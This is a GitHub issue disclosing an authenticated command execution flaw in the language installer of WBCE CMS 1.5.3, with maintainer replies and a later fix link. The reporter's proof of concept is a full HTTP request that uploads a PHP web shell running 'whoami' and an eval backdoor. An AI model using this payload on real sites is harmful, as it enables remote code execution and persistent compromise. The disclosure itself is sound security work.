WBCE / WBCE_CMS

Core package of WBCE CMS. This package includes the core and the default addons. Visit https://wbce.org (DE) or https://wbce-cms.org (EN) to learn more or to join the WBCE CMS community.
https://wbce-cms.org
GNU General Public License v2.0
32 stars 22 forks source link

Command execution vulnerability exists in WBCE CMS V1.5.3 background #544

Closed secflag closed 8 months ago

secflag commented 1 year ago

Vulnerability description

There is a command execution vulnerability in the background of WBCE CMS V1.5.3. Vulnerability URL /admin/languages/install.php Install Language module parameter filtering is not strict, there is a command execution vulnerability

Vulnerability analysis

In the receiving method on line 47 of the file /admin/languages/install.php, the system first saves the data submitted by the client to a temporary file, and then executes the relevant code to trigger the command execution vulnerability.

image-20230314132608851

Vulnerability verification process

POST /admin/languages/install.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/admin/languages/index.php
Cookie: phpsessid-5239-sid=hhh85m1as94tpdkq36vnjcommm; WBCELastConnectJS=1664417056; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------7377265762079
Content-Length: 496

-----------------------------7377265762079
Content-Disposition: form-data; name="formtoken"

67491209-95651bfdf4022592df7062726ca433cbba088a8b
-----------------------------7377265762079
Content-Disposition: form-data; name

Content-Type: application/octet-stream

<?php echo(system('whoami'));@eval($_POST[stcs]);?>
-----------------------------7377265762079
Content-Disposition: form-data; name="submit"

-----------------------------7377265762079—

image-20230314132722979

instantflorian commented 1 year ago

Thanks for reporting. The vulnerability is only accessable if a malicious user has a) backend access and b) is allowed to install languages. Fixing the issue would mean to apply conceptional changes to the whloe language management; so actually it is in the responsibility of the site administrator to grant access only to trustworthy users and only the areas they really need (e.g. editing contents but not installing modules, languages etc.). Nevertheless we will take this into consideration for a later version.

instantflorian commented 8 months ago

fixed with https://github.com/WBCE/WBCE_CMS/commit/e4349444136ea0deb835ab8787a59e53b99d63ad